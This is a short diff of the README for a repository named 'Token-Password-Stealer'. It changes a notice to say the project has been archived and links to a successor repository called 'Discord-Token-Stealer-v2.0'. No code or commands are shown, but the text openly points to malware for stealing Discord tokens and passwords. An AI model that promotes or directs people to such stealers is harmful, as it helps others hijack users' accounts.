ballersuperinanauditorium/Token-Password-Stealer/README.md

 # Token-Password-Stealer

-## ⚠️THIS PROJECT IS OUTDATED AND IS BEING REVAMPED AND WILL BE ARCHIVED, [HERE](https://github.com/vghcodesjs/Discord-Token-Stealer-v2.0) IS THE NEW REPOSITORY.
+## ⚠️THIS PROJECT IS OUTDATED AND IS BEING REVAMPED AND HAS BEEN ARCHIVED, [HERE](https://github.com/vghcodesjs/Discord-Token-Stealer-v2.0) IS THE NEW REPOSITORY.

 ## Introduction